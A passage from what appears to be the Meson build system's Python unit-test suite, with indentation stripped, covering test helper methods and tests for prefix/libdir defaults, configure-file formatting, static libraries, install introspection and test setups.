'''
env = get_fake_env()
interp = Interpreter(FakeBuild(env), mock=True)
url = 'https://raw.githubusercontent.com/TingPing/language-meson/master/grammars/meson.json'
try:
# Use a timeout to avoid blocking forever in case the network is
# slow or unavailable in a weird way
r = urllib.request.urlopen(url, timeout=URLOPEN_TIMEOUT)
except urllib.error.URLError as e:
# Skip test when network is not available, such as during packaging
# by a distro or Flatpak
if not isinstance(e, urllib.error.HTTPError):
raise unittest.SkipTest('Network unavailable')
# Don't fail the test if github is down, but do fail if 4xx
if e.code >= 500:
raise unittest.SkipTest('Server error ' + str(e.code))
raise e
# On Python 3.5, we must decode bytes to string. Newer versions don't require that.
grammar = json.loads(r.read().decode('utf-8', 'surrogatepass'))
for each in grammar['patterns']:
if 'name' in each and each['name'] == 'support.function.builtin.meson':
# The string is of the form: (?x)\\b(func1|func2|...\n)\\b\\s*(?=\\() and
# we convert that to [func1, func2, ...] without using regex to parse regex
funcs = set(each['match'].split('\\b(')[1].split('\n')[0].split('|'))
if 'name' in each and each['name'] == 'support.variable.meson':
# \\b(builtin1|builtin2...)\\b
builtin = set(each['match'].split('\\b(')[1].split(')\\b')[0].split('|'))
self.assertEqual(builtin, set(interp.builtin.keys()))
self.assertEqual(funcs, set(interp.funcs.keys()))
def test_all_functions_defined_in_ast_interpreter(self):
'''
Ensure that the all functions defined in the Interpreter are also defined
in the AstInterpreter (and vice versa).
'''
env = get_fake_env()
interp = Interpreter(FakeBuild(env), mock=True)
astint = AstInterpreter('.', '', '')
self.assertEqual(set(interp.funcs.keys()), set(astint.funcs.keys()))
def test_mesondata_is_up_to_date(self):
from mesonbuild.mesondata import mesondata
err_msg = textwrap.dedent('''
###########################################################
### mesonbuild.mesondata is not up-to-date ###
### Please regenerate it by running tools/gen_data.py ###
###########################################################
''')
root_dir = Path(__file__).resolve().parent
mesonbuild_dir = root_dir / 'mesonbuild'
data_dirs = mesonbuild_dir.glob('**/data')
data_files = [] # type: T.List[T.Tuple(str, str)]
for i in data_dirs:
for p in i.iterdir():
data_files += [(p.relative_to(mesonbuild_dir).as_posix(), hashlib.sha256(p.read_bytes()).hexdigest())]
from pprint import pprint
current_files = set(mesondata.keys())
scanned_files = set([x[0] for x in data_files])
self.assertSetEqual(current_files, scanned_files, err_msg + 'Data files were added or removed\n')
errors = []
for i in data_files:
if mesondata[i[0]].sha256sum != i[1]:
errors += [i[0]]
self.assertListEqual(errors, [], err_msg + 'Files were changed')
class BasePlatformTests(unittest.TestCase):
prefix = '/usr'
libdir = 'lib'
def setUp(self):
super().setUp()
self.maxDiff = None
src_root = os.path.dirname(__file__)
src_root = os.path.join(os.getcwd(), src_root)
self.src_root = src_root
# Get the backend
# FIXME: Extract this from argv?
self.backend = getattr(Backend, os.environ.get('MESON_UNIT_TEST_BACKEND', 'ninja'))
self.meson_args = ['--backend=' + self.backend.name]
self.meson_native_file = None
self.meson_cross_file = None
self.meson_command = python_command + [get_meson_script()]
self.setup_command = self.meson_command + self.meson_args
self.mconf_command = self.meson_command + ['configure']
self.mintro_command = self.meson_command + ['introspect']
self.wrap_command = self.meson_command + ['wrap']
self.rewrite_command = self.meson_command + ['rewrite']
# Backend-specific build commands
self.build_command, self.clean_command, self.test_command, self.install_command, \
self.uninstall_command = get_backend_commands(self.backend)
# Test directories
self.common_test_dir = os.path.join(src_root, 'test cases/common')
self.vala_test_dir = os.path.join(src_root, 'test cases/vala')
self.framework_test_dir = os.path.join(src_root, 'test cases/frameworks')
self.unit_test_dir = os.path.join(src_root, 'test cases/unit')
self.rewrite_test_dir = os.path.join(src_root, 'test cases/rewrite')
self.linuxlike_test_dir = os.path.join(src_root, 'test cases/linuxlike')
# Misc stuff
self.orig_env = os.environ.copy()
if self.backend is Backend.ninja:
self.no_rebuild_stdout = ['ninja: no work to do.', 'samu: nothing to do']
else:
# VS doesn't have a stable output when no changes are done
# XCode backend is untested with unit tests, help welcome!
self.no_rebuild_stdout = ['UNKNOWN BACKEND {!r}'.format(self.backend.name)]
self.builddirs = []
self.new_builddir()
def change_builddir(self, newdir):
self.builddir = newdir
self.privatedir = os.path.join(self.builddir, 'meson-private')
self.logdir = os.path.join(self.builddir, 'meson-logs')
self.installdir = os.path.join(self.builddir, 'install')
self.distdir = os.path.join(self.builddir, 'meson-dist')
self.mtest_command = self.meson_command + ['test', '-C', self.builddir]
self.builddirs.append(self.builddir)
def new_builddir(self):
if not is_cygwin():
# Keep builddirs inside the source tree so that virus scanners
# don't complain
newdir = tempfile.mkdtemp(dir=os.getcwd())
else:
# But not on Cygwin because that breaks the umask tests. See:
# https://github.com/mesonbuild/meson/pull/5546#issuecomment-509666523
newdir = tempfile.mkdtemp()
# In case the directory is inside a symlinked directory, find the real
# path otherwise we might not find the srcdir from inside the builddir.
newdir = os.path.realpath(newdir)
self.change_builddir(newdir)
def _print_meson_log(self):
log = os.path.join(self.logdir, 'meson-log.txt')
if not os.path.isfile(log):
print("{!r} doesn't exist".format(log))
return
with open(log, 'r', encoding='utf-8') as f:
print(f.read())
def tearDown(self):
for path in self.builddirs:
try:
windows_proof_rmtree(path)
except FileNotFoundError:
pass
os.environ.clear()
os.environ.update(self.orig_env)
super().tearDown()
def _run(self, command, *, workdir=None, override_envvars=None):
'''
Run a command while printing the stdout and stderr to stdout,
and also return a copy of it
'''
# If this call hangs CI will just abort. It is very hard to distinguish
# between CI issue and test bug in that case. Set timeout and fail loud
# instead.
if override_envvars is None:
env = None
else:
env = os.environ.copy()
env.update(override_envvars)
p = subprocess.run(command, stdout=subprocess.PIPE,
stderr=subprocess.STDOUT, env=env,
universal_newlines=True, cwd=workdir, timeout=60 * 5)
print(p.stdout)
if p.returncode != 0:
if 'MESON_SKIP_TEST' in p.stdout:
raise unittest.SkipTest('Project requested skipping.')
raise subprocess.CalledProcessError(p.returncode, command, output=p.stdout)
return p.stdout
def init(self, srcdir, *,
extra_args=None,
default_args=True,
inprocess=False,
override_envvars=None,
workdir=None):
self.assertPathExists(srcdir)
if extra_args is None:
extra_args = []
if not isinstance(extra_args, list):
extra_args = [extra_args]
args = [srcdir, self.builddir]
if default_args:
args += ['--prefix', self.prefix]
if self.libdir:
args += ['--libdir', self.libdir]
if self.meson_native_file:
args += ['--native-file', self.meson_native_file]
if self.meson_cross_file:
args += ['--cross-file', self.meson_cross_file]
self.privatedir = os.path.join(self.builddir, 'meson-private')
if inprocess:
try:
if override_envvars is not None:
old_envvars = os.environ.copy()
os.environ.update(override_envvars)
(returncode, out, err) = run_configure_inprocess(self.meson_args + args + extra_args)
if override_envvars is not None:
os.environ.clear()
os.environ.update(old_envvars)
if 'MESON_SKIP_TEST' in out:
raise unittest.SkipTest('Project requested skipping.')
if returncode != 0:
self._print_meson_log()
print('Stdout:\n')
print(out)
print('Stderr:\n')
print(err)
raise RuntimeError('Configure failed')
except Exception:
self._print_meson_log()
raise
finally:
# Close log file to satisfy Windows file locking
mesonbuild.mlog.shutdown()
mesonbuild.mlog.log_dir = None
mesonbuild.mlog.log_file = None
else:
try:
out = self._run(self.setup_command + args + extra_args, override_envvars=override_envvars, workdir=workdir)
except unittest.SkipTest:
raise unittest.SkipTest('Project requested skipping: ' + srcdir)
except Exception:
self._print_meson_log()
raise
return out
def build(self, target=None, *, extra_args=None, override_envvars=None):
if extra_args is None:
extra_args = []
# Add arguments for building the target (if specified),
# and using the build dir (if required, with VS)
args = get_builddir_target_args(self.backend, self.builddir, target)
return self._run(self.build_command + args + extra_args, workdir=self.builddir, override_envvars=override_envvars)
def clean(self, *, override_envvars=None):
dir_args = get_builddir_target_args(self.backend, self.builddir, None)
self._run(self.clean_command + dir_args, workdir=self.builddir, override_envvars=override_envvars)
def run_tests(self, *, inprocess=False, override_envvars=None):
if not inprocess:
self._run(self.test_command, workdir=self.builddir, override_envvars=override_envvars)
else:
if override_envvars is not None:
old_envvars = os.environ.copy()
os.environ.update(override_envvars)
try:
run_mtest_inprocess(['-C', self.builddir])
finally:
if override_envvars is not None:
os.environ.clear()
os.environ.update(old_envvars)
def install(self, *, use_destdir=True, override_envvars=None):
if self.backend is not Backend.ninja:
raise unittest.SkipTest('{!r} backend can\'t install files'.format(self.backend.name))
if use_destdir:
destdir = {'DESTDIR': self.installdir}
if override_envvars is None:
override_envvars = destdir
else:
override_envvars.update(destdir)
self._run(self.install_command, workdir=self.builddir, override_envvars=override_envvars)
def uninstall(self, *, override_envvars=None):
self._run(self.uninstall_command, workdir=self.builddir, override_envvars=override_envvars)
def run_target(self, target, *, override_envvars=None):
'''
Run a Ninja target while printing the stdout and stderr to stdout,
and also return a copy of it
'''
return self.build(target=target, override_envvars=override_envvars)
def setconf(self, arg, will_build=True):
if not isinstance(arg, list):
arg = [arg]
if will_build:
ensure_backend_detects_changes(self.backend)
self._run(self.mconf_command + arg + [self.builddir])
def wipe(self):
windows_proof_rmtree(self.builddir)
def utime(self, f):
ensure_backend_detects_changes(self.backend)
os.utime(f)
def get_compdb(self):
if self.backend is not Backend.ninja:
raise unittest.SkipTest('Compiler db not available with {} backend'.format(self.backend.name))
try:
with open(os.path.join(self.builddir, 'compile_commands.json')) as ifile:
contents = json.load(ifile)
except FileNotFoundError:
raise unittest.SkipTest('Compiler db not found')
# If Ninja is using .rsp files, generate them, read their contents, and
# replace it as the command for all compile commands in the parsed json.
if len(contents) > 0 and contents[0]['command'].endswith('.rsp'):
# Pretend to build so that the rsp files are generated
self.build(extra_args=['-d', 'keeprsp', '-n'])
for each in contents:
# Extract the actual command from the rsp file
compiler, rsp = each['command'].split(' @')
rsp = os.path.join(self.builddir, rsp)
# Replace the command with its contents
with open(rsp, 'r', encoding='utf-8') as f:
each['command'] = compiler + ' ' + f.read()
return contents
def get_meson_log(self):
with open(os.path.join(self.builddir, 'meson-logs', 'meson-log.txt')) as f:
return f.readlines()
def get_meson_log_compiler_checks(self):
'''
Fetch a list command-lines run by meson for compiler checks.
Each command-line is returned as a list of arguments.
'''
log = self.get_meson_log()
prefix = 'Command line:'
cmds = [l[len(prefix):].split() for l in log if l.startswith(prefix)]
return cmds
def introspect(self, args):
if isinstance(args, str):
args = [args]
out = subprocess.check_output(self.mintro_command + args + [self.builddir],
universal_newlines=True)
return json.loads(out)
def introspect_directory(self, directory, args):
if isinstance(args, str):
args = [args]
out = subprocess.check_output(self.mintro_command + args + [directory],
universal_newlines=True)
try:
obj = json.loads(out)
except Exception as e:
print(out)
raise e
return obj
def assertPathEqual(self, path1, path2):
'''
Handles a lot of platform-specific quirks related to paths such as
separator, case-sensitivity, etc.
'''
self.assertEqual(PurePath(path1), PurePath(path2))
def assertPathListEqual(self, pathlist1, pathlist2):
self.assertEqual(len(pathlist1), len(pathlist2))
worklist = list(zip(pathlist1, pathlist2))
for i in worklist:
if i[0] is None:
self.assertEqual(i[0], i[1])
else:
self.assertPathEqual(i[0], i[1])
def assertPathBasenameEqual(self, path, basename):
msg = '{!r} does not end with {!r}'.format(path, basename)
# We cannot use os.path.basename because it returns '' when the path
# ends with '/' for some silly reason. This is not how the UNIX utility
# `basename` works.
path_basename = PurePath(path).parts[-1]
self.assertEqual(PurePath(path_basename), PurePath(basename), msg)
def assertReconfiguredBuildIsNoop(self):
'Assert that we reconfigured and then there was nothing to do'
ret = self.build()
self.assertIn('The Meson build system', ret)
if self.backend is Backend.ninja:
for line in ret.split('\n'):
if line in self.no_rebuild_stdout:
break
else:
raise AssertionError('build was reconfigured, but was not no-op')
elif self.backend is Backend.vs:
# Ensure that some target said that no rebuild was done
# XXX: Note CustomBuild did indeed rebuild, because of the regen checker!
self.assertIn('ClCompile:\n All outputs are up-to-date.', ret)
self.assertIn('Link:\n All outputs are up-to-date.', ret)
# Ensure that no targets were built
self.assertNotRegex(ret, re.compile('ClCompile:\n [^\n]*cl', flags=re.IGNORECASE))
self.assertNotRegex(ret, re.compile('Link:\n [^\n]*link', flags=re.IGNORECASE))
elif self.backend is Backend.xcode:
raise unittest.SkipTest('Please help us fix this test on the xcode backend')
else:
raise RuntimeError('Invalid backend: {!r}'.format(self.backend.name))
def assertBuildIsNoop(self):
ret = self.build()
if self.backend is Backend.ninja:
self.assertIn(ret.split('\n')[-2], self.no_rebuild_stdout)
elif self.backend is Backend.vs:
# Ensure that some target of each type said that no rebuild was done
# We always have at least one CustomBuild target for the regen checker
self.assertIn('CustomBuild:\n All outputs are up-to-date.', ret)
self.assertIn('ClCompile:\n All outputs are up-to-date.', ret)
self.assertIn('Link:\n All outputs are up-to-date.', ret)
# Ensure that no targets were built
self.assertNotRegex(ret, re.compile('CustomBuild:\n [^\n]*cl', flags=re.IGNORECASE))
self.assertNotRegex(ret, re.compile('ClCompile:\n [^\n]*cl', flags=re.IGNORECASE))
self.assertNotRegex(ret, re.compile('Link:\n [^\n]*link', flags=re.IGNORECASE))
elif self.backend is Backend.xcode:
raise unittest.SkipTest('Please help us fix this test on the xcode backend')
else:
raise RuntimeError('Invalid backend: {!r}'.format(self.backend.name))
def assertRebuiltTarget(self, target):
ret = self.build()
if self.backend is Backend.ninja:
self.assertIn('Linking target {}'.format(target), ret)
elif self.backend is Backend.vs:
# Ensure that this target was rebuilt
linkre = re.compile('Link:\n [^\n]*link[^\n]*' + target, flags=re.IGNORECASE)
self.assertRegex(ret, linkre)
elif self.backend is Backend.xcode:
raise unittest.SkipTest('Please help us fix this test on the xcode backend')
else:
raise RuntimeError('Invalid backend: {!r}'.format(self.backend.name))
@staticmethod
def get_target_from_filename(filename):
base = os.path.splitext(filename)[0]
if base.startswith(('lib', 'cyg')):
return base[3:]
return base
def assertBuildRelinkedOnlyTarget(self, target):
ret = self.build()
if self.backend is Backend.ninja:
linked_targets = []
for line in ret.split('\n'):
if 'Linking target' in line:
fname = line.rsplit('target ')[-1]
linked_targets.append(self.get_target_from_filename(fname))
self.assertEqual(linked_targets, [target])
elif self.backend is Backend.vs:
# Ensure that this target was rebuilt
linkre = re.compile(r'Link:\n [^\n]*link.exe[^\n]*/OUT:".\\([^"]*)"', flags=re.IGNORECASE)
matches = linkre.findall(ret)
self.assertEqual(len(matches), 1, msg=matches)
self.assertEqual(self.get_target_from_filename(matches[0]), target)
elif self.backend is Backend.xcode:
raise unittest.SkipTest('Please help us fix this test on the xcode backend')
else:
raise RuntimeError('Invalid backend: {!r}'.format(self.backend.name))
def assertPathExists(self, path):
m = 'Path {!r} should exist'.format(path)
self.assertTrue(os.path.exists(path), msg=m)
def assertPathDoesNotExist(self, path):
m = 'Path {!r} should not exist'.format(path)
self.assertFalse(os.path.exists(path), msg=m)
class AllPlatformTests(BasePlatformTests):
'''
Tests that should run on all platforms
'''
def test_default_options_prefix(self):
'''
Tests that setting a prefix in default_options in project() works.
Can't be an ordinary test because we pass --prefix to meson there.
https://github.com/mesonbuild/meson/issues/1349
'''
testdir = os.path.join(self.common_test_dir, '90 default options')
self.init(testdir, default_args=False)
opts = self.introspect('--buildoptions')
for opt in opts:
if opt['name'] == 'prefix':
prefix = opt['value']
self.assertEqual(prefix, '/absoluteprefix')
def test_do_conf_file_preserve_newlines(self):
def conf_file(in_data, confdata):
with temp_filename() as fin:
with open(fin, 'wb') as fobj:
fobj.write(in_data.encode('utf-8'))
with temp_filename() as fout:
mesonbuild.mesonlib.do_conf_file(fin, fout, confdata, 'meson')
with open(fout, 'rb') as fobj:
return fobj.read().decode('utf-8')
confdata = {'VAR': ('foo', 'bar')}
self.assertEqual(conf_file('@VAR@\n@VAR@\n', confdata), 'foo\nfoo\n')
self.assertEqual(conf_file('@VAR@\r\n@VAR@\r\n', confdata), 'foo\r\nfoo\r\n')
def test_do_conf_file_by_format(self):
def conf_str(in_data, confdata, vformat):
(result, missing_variables, confdata_useless) = mesonbuild.mesonlib.do_conf_str(in_data, confdata, variable_format = vformat)
return '\n'.join(result)
def check_formats(confdata, result):
self.assertEqual(conf_str(['#mesondefine VAR'], confdata, 'meson'), result)
self.assertEqual(conf_str(['#cmakedefine VAR ${VAR}'], confdata, 'cmake'), result)
self.assertEqual(conf_str(['#cmakedefine VAR @VAR@'], confdata, 'cmake@'), result)
confdata = ConfigurationData()
# Key error as they do not exists
check_formats(confdata, '/* #undef VAR */\n')
# Check boolean
confdata.values = {'VAR': (False, 'description')}
check_formats(confdata, '#undef VAR\n')
confdata.values = {'VAR': (True, 'description')}
check_formats(confdata, '#define VAR\n')
# Check string
confdata.values = {'VAR': ('value', 'description')}
check_formats(confdata, '#define VAR value\n')
# Check integer
confdata.values = {'VAR': (10, 'description')}
check_formats(confdata, '#define VAR 10\n')
# Check multiple string with cmake formats
confdata.values = {'VAR': ('value', 'description')}
self.assertEqual(conf_str(['#cmakedefine VAR xxx @VAR@ yyy @VAR@'], confdata, 'cmake@'), '#define VAR xxx value yyy value\n')
self.assertEqual(conf_str(['#define VAR xxx @VAR@ yyy @VAR@'], confdata, 'cmake@'), '#define VAR xxx value yyy value')
self.assertEqual(conf_str(['#cmakedefine VAR xxx ${VAR} yyy ${VAR}'], confdata, 'cmake'), '#define VAR xxx value yyy value\n')
self.assertEqual(conf_str(['#define VAR xxx ${VAR} yyy ${VAR}'], confdata, 'cmake'), '#define VAR xxx value yyy value')
# Handles meson format exceptions
# Unknown format
self.assertRaises(mesonbuild.mesonlib.MesonException, conf_str, ['#mesondefine VAR xxx'], confdata, 'unknown_format')
# More than 2 params in mesondefine
self.assertRaises(mesonbuild.mesonlib.MesonException, conf_str, ['#mesondefine VAR xxx'], confdata, 'meson')
# Mismatched line with format
self.assertRaises(mesonbuild.mesonlib.MesonException, conf_str, ['#cmakedefine VAR'], confdata, 'meson')
self.assertRaises(mesonbuild.mesonlib.MesonException, conf_str, ['#mesondefine VAR'], confdata, 'cmake')
self.assertRaises(mesonbuild.mesonlib.MesonException, conf_str, ['#mesondefine VAR'], confdata, 'cmake@')
# Dict value in confdata
confdata.values = {'VAR': (['value'], 'description')}
self.assertRaises(mesonbuild.mesonlib.MesonException, conf_str, ['#mesondefine VAR'], confdata, 'meson')
def test_absolute_prefix_libdir(self):
'''
Tests that setting absolute paths for --prefix and --libdir work. Can't
be an ordinary test because these are set via the command-line.
https://github.com/mesonbuild/meson/issues/1341
https://github.com/mesonbuild/meson/issues/1345
'''
testdir = os.path.join(self.common_test_dir, '90 default options')
# on Windows, /someabs is *not* an absolute path
prefix = 'x:/someabs' if is_windows() else '/someabs'
libdir = 'libdir'
extra_args = ['--prefix=' + prefix,
# This can just be a relative path, but we want to test
# that passing this as an absolute path also works
'--libdir=' + prefix + '/' + libdir]
self.init(testdir, extra_args=extra_args, default_args=False)
opts = self.introspect('--buildoptions')
for opt in opts:
if opt['name'] == 'prefix':
self.assertEqual(prefix, opt['value'])
elif opt['name'] == 'libdir':
self.assertEqual(libdir, opt['value'])
def test_libdir_must_be_inside_prefix(self):
'''
Tests that libdir is forced to be inside prefix no matter how it is set.
Must be a unit test for obvious reasons.
'''
testdir = os.path.join(self.common_test_dir, '1 trivial')
# libdir being inside prefix is ok
if is_windows():
args = ['--prefix', 'x:/opt', '--libdir', 'x:/opt/lib32']
else:
args = ['--prefix', '/opt', '--libdir', '/opt/lib32']
self.init(testdir, extra_args=args)
self.wipe()
# libdir not being inside prefix is not ok
if is_windows():
args = ['--prefix', 'x:/usr', '--libdir', 'x:/opt/lib32']
else:
args = ['--prefix', '/usr', '--libdir', '/opt/lib32']
self.assertRaises(subprocess.CalledProcessError, self.init, testdir, extra_args=args)
self.wipe()
# libdir must be inside prefix even when set via mesonconf
self.init(testdir)
if is_windows():
self.assertRaises(subprocess.CalledProcessError, self.setconf, '-Dlibdir=x:/opt', False)
else:
self.assertRaises(subprocess.CalledProcessError, self.setconf, '-Dlibdir=/opt', False)
def test_prefix_dependent_defaults(self):
'''
Tests that configured directory paths are set to prefix dependent
defaults.
'''
testdir = os.path.join(self.common_test_dir, '1 trivial')
expected = {
'/opt': {'prefix': '/opt',
'bindir': 'bin', 'datadir': 'share', 'includedir': 'include',
'infodir': 'share/info',
'libexecdir': 'libexec', 'localedir': 'share/locale',
'localstatedir': 'var', 'mandir': 'share/man',
'sbindir': 'sbin', 'sharedstatedir': 'com',
'sysconfdir': 'etc'},
'/usr': {'prefix': '/usr',
'bindir': 'bin', 'datadir': 'share', 'includedir': 'include',
'infodir': 'share/info',
'libexecdir': 'libexec', 'localedir': 'share/locale',
'localstatedir': '/var', 'mandir': 'share/man',
'sbindir': 'sbin', 'sharedstatedir': '/var/lib',
'sysconfdir': '/etc'},
'/usr/local': {'prefix': '/usr/local',
'bindir': 'bin', 'datadir': 'share',
'includedir': 'include', 'infodir': 'share/info',
'libexecdir': 'libexec',
'localedir': 'share/locale',
'localstatedir': '/var/local', 'mandir': 'share/man',
'sbindir': 'sbin', 'sharedstatedir': '/var/local/lib',
'sysconfdir': 'etc'},
# N.B. We don't check 'libdir' as it's platform dependent, see
# default_libdir():
}
if mesonbuild.mesonlib.default_prefix() == '/usr/local':
expected[None] = expected['/usr/local']
for prefix in expected:
args = []
if prefix:
args += ['--prefix', prefix]
self.init(testdir, extra_args=args, default_args=False)
opts = self.introspect('--buildoptions')
for opt in opts:
name = opt['name']
value = opt['value']
if name in expected[prefix]:
self.assertEqual(value, expected[prefix][name])
self.wipe()
def test_default_options_prefix_dependent_defaults(self):
'''
Tests that setting a prefix in default_options in project() sets prefix
dependent defaults for other options, and that those defaults can
be overridden in default_options or by the command line.
'''
testdir = os.path.join(self.common_test_dir, '168 default options prefix dependent defaults')
expected = {
'':
{'prefix': '/usr',
'sysconfdir': '/etc',
'localstatedir': '/var',
'sharedstatedir': '/sharedstate'},
'--prefix=/usr':
{'prefix': '/usr',
'sysconfdir': '/etc',
'localstatedir': '/var',
'sharedstatedir': '/sharedstate'},
'--sharedstatedir=/var/state':
{'prefix': '/usr',
'sysconfdir': '/etc',
'localstatedir': '/var',
'sharedstatedir': '/var/state'},
'--sharedstatedir=/var/state --prefix=/usr --sysconfdir=sysconf':
{'prefix': '/usr',
'sysconfdir': 'sysconf',
'localstatedir': '/var',
'sharedstatedir': '/var/state'},
}
for args in expected:
self.init(testdir, extra_args=args.split(), default_args=False)
opts = self.introspect('--buildoptions')
for opt in opts:
name = opt['name']
value = opt['value']
if name in expected[args]:
self.assertEqual(value, expected[args][name])
self.wipe()
def test_clike_get_library_dirs(self):
env = get_fake_env()
cc = env.detect_c_compiler(MachineChoice.HOST)
for d in cc.get_library_dirs(env):
self.assertTrue(os.path.exists(d))
self.assertTrue(os.path.isdir(d))
self.assertTrue(os.path.isabs(d))
def test_static_library_overwrite(self):
'''
Tests that static libraries are never appended to, always overwritten.
Has to be a unit test because this involves building a project,
reconfiguring, and building it again so that `ar` is run twice on the
same static library.
https://github.com/mesonbuild/meson/issues/1355
'''
testdir = os.path.join(self.common_test_dir, '3 static')
env = get_fake_env(testdir, self.builddir, self.prefix)
cc = env.detect_c_compiler(MachineChoice.HOST)
static_linker = env.detect_static_linker(cc)
if is_windows():
raise unittest.SkipTest('https://github.com/mesonbuild/meson/issues/1526')
if not isinstance(static_linker, mesonbuild.linkers.ArLinker):
raise unittest.SkipTest('static linker is not `ar`')
# Configure
self.init(testdir)
# Get name of static library
targets = self.introspect('--targets')
self.assertEqual(len(targets), 1)
libname = targets[0]['filename'][0]
# Build and get contents of static library
self.build()
before = self._run(['ar', 't', os.path.join(self.builddir, libname)]).split()
# Filter out non-object-file contents
before = [f for f in before if f.endswith(('.o', '.obj'))]
# Static library should contain only one object
self.assertEqual(len(before), 1, msg=before)
# Change the source to be built into the static library
self.setconf('-Dsource=libfile2.c')
self.build()
after = self._run(['ar', 't', os.path.join(self.builddir, libname)]).split()
# Filter out non-object-file contents
after = [f for f in after if f.endswith(('.o', '.obj'))]
# Static library should contain only one object
self.assertEqual(len(after), 1, msg=after)
# and the object must have changed
self.assertNotEqual(before, after)
def test_static_compile_order(self):
'''
Test that the order of files in a compiler command-line while compiling
and linking statically is deterministic. This can't be an ordinary test
case because we need to inspect the compiler database.
https://github.com/mesonbuild/meson/pull/951
'''
testdir = os.path.join(self.common_test_dir, '5 linkstatic')
self.init(testdir)
compdb = self.get_compdb()
# Rules will get written out in this order
self.assertTrue(compdb[0]['file'].endswith("libfile.c"))
self.assertTrue(compdb[1]['file'].endswith("libfile2.c"))
self.assertTrue(compdb[2]['file'].endswith("libfile3.c"))
self.assertTrue(compdb[3]['file'].endswith("libfile4.c"))
# FIXME: We don't have access to the linker command
def test_run_target_files_path(self):
'''
Test that run_targets are run from the correct directory
https://github.com/mesonbuild/meson/issues/957
'''
testdir = os.path.join(self.common_test_dir, '54 run target')
self.init(testdir)
self.run_target('check_exists')
def test_install_introspection(self):
'''
Tests that the Meson introspection API exposes install filenames correctly
https://github.com/mesonbuild/meson/issues/829
'''
if self.backend is not Backend.ninja:
raise unittest.SkipTest('{!r} backend can\'t install files'.format(self.backend.name))
testdir = os.path.join(self.common_test_dir, '8 install')
self.init(testdir)
intro = self.introspect('--targets')
if intro[0]['type'] == 'executable':
intro = intro[::-1]
self.assertPathListEqual(intro[0]['install_filename'], ['/usr/lib/libstat.a'])
self.assertPathListEqual(intro[1]['install_filename'], ['/usr/bin/prog' + exe_suffix])
def test_install_subdir_introspection(self):
'''
Test that the Meson introspection API also contains subdir install information
https://github.com/mesonbuild/meson/issues/5556
'''
testdir = os.path.join(self.common_test_dir, '62 install subdir')
self.init(testdir)
intro = self.introspect('--installed')
expected = {
'sub2': 'share/sub2',
'subdir/sub1': 'share/sub1',
'subdir/sub_elided': 'share',
'sub1': 'share/sub1',
'sub/sub1': 'share/sub1',
'sub_elided': 'share',
'nested_elided/sub': 'share',
}
self.assertEqual(len(intro), len(expected))
# Convert expected to PurePath
expected_converted = {PurePath(os.path.join(testdir, key)): PurePath(os.path.join(self.prefix, val)) for key, val in expected.items()}
intro_converted = {PurePath(key): PurePath(val) for key, val in intro.items()}
for src, dst in expected_converted.items():
self.assertIn(src, intro_converted)
self.assertEqual(dst, intro_converted[src])
def test_install_introspection_multiple_outputs(self):
'''
Tests that the Meson introspection API exposes multiple install filenames correctly without crashing
https://github.com/mesonbuild/meson/pull/4555
Reverted to the first file only because of https://github.com/mesonbuild/meson/pull/4547#discussion_r244173438
TODO Change the format to a list officially in a followup PR
'''
if self.backend is not Backend.ninja:
raise unittest.SkipTest('{!r} backend can\'t install files'.format(self.backend.name))
testdir = os.path.join(self.common_test_dir, '144 custom target multiple outputs')
self.init(testdir)
intro = self.introspect('--targets')
if intro[0]['type'] == 'executable':
intro = intro[::-1]
self.assertPathListEqual(intro[0]['install_filename'], ['/usr/include/diff.h', '/usr/bin/diff.sh'])
self.assertPathListEqual(intro[1]['install_filename'], ['/opt/same.h', '/opt/same.sh'])
self.assertPathListEqual(intro[2]['install_filename'], ['/usr/include/first.h', None])
self.assertPathListEqual(intro[3]['install_filename'], [None, '/usr/bin/second.sh'])
def test_install_log_content(self):
'''
Tests that the install-log.txt is consistent with the installed files and directories.
Specifically checks that the log file only contains one entry per file/directory.
https://github.com/mesonbuild/meson/issues/4499
'''
testdir = os.path.join(self.common_test_dir, '62 install subdir')
self.init(testdir)
self.install()
installpath = Path(self.installdir)
# Find installed files and directories
expected = {installpath: 0}
for name in installpath.rglob('*'):
expected[name] = 0
# Find logged files and directories
with Path(self.builddir, 'meson-logs', 'install-log.txt').open() as f:
logged = list(map(lambda l: Path(l.strip()),
filter(lambda l: not l.startswith('#'),
f.readlines())))
for name in logged:
self.assertTrue(name in expected, 'Log contains extra entry {}'.format(name))
expected[name] += 1
for name, count in expected.items():
self.assertGreater(count, 0, 'Log is missing entry for {}'.format(name))
self.assertLess(count, 2, 'Log has multiple entries for {}'.format(name))
def test_uninstall(self):
exename = os.path.join(self.installdir, 'usr/bin/prog' + exe_suffix)
testdir = os.path.join(self.common_test_dir, '8 install')
self.init(testdir)
self.assertPathDoesNotExist(exename)
self.install()
self.assertPathExists(exename)
self.uninstall()
self.assertPathDoesNotExist(exename)
def test_forcefallback(self):
testdir = os.path.join(self.unit_test_dir, '31 forcefallback')
self.init(testdir, extra_args=['--wrap-mode=forcefallback'])
self.build()
self.run_tests()
def test_force_fallback_for(self):
testdir = os.path.join(self.unit_test_dir, '31 forcefallback')
self.init(testdir, extra_args=['--force-fallback-for=zlib,foo'])
self.build()
self.run_tests()
def test_env_ops_dont_stack(self):
'''
Test that env ops prepend/append do not stack, and that this usage issues a warning
'''
testdir = os.path.join(self.unit_test_dir, '63 test env does not stack')
out = self.init(testdir)
self.assertRegex(out, r'WARNING: Overriding.*TEST_VAR_APPEND')
self.assertRegex(out, r'WARNING: Overriding.*TEST_VAR_PREPEND')
self.assertNotRegex(out, r'WARNING: Overriding.*TEST_VAR_SET')
self.run_tests()
def test_testsetups(self):
if not shutil.which('valgrind'):
raise unittest.SkipTest('Valgrind not installed.')
testdir = os.path.join(self.unit_test_dir, '2 testsetups')
self.init(testdir)
self.build()
# Run tests without setup
self.run_tests()
with open(os.path.join(self.logdir, 'testlog.txt')) as f:
basic_log = f.read()
# Run buggy test with setup that has env that will make it fail
self.assertRaises(subprocess.CalledProcessError,
self._run, self.mtest_command + ['--setup=valgrind'])
with open(os.path.join(self.logdir, 'testlog-valgrind.txt')) as f:
vg_log = f.read()
self.assertFalse('TEST_ENV is set' in basic_log)
self.assertFalse('Memcheck' in basic_log)
self.assertTrue('TEST_ENV is set' in vg_log)
self.assertTrue('Memcheck' in vg_log)
# Run buggy test with setup without env that will pass
self._run(self.mtest_command + ['--setup=wrapper'])
# Setup with no properties works
self._run(self.mtest_command + ['--setup=empty'])
# Setup with only env works
self._run(self.mtest_command + ['--setup=onlyenv'])
self._run(self.mtest_command + ['--setup=onlyenv2'])
self._run(self.mtest_command + ['--setup=onlyenv3'])
# Setup with only a timeout works
self._run(self.mtest_command + ['--setup=timeout'])
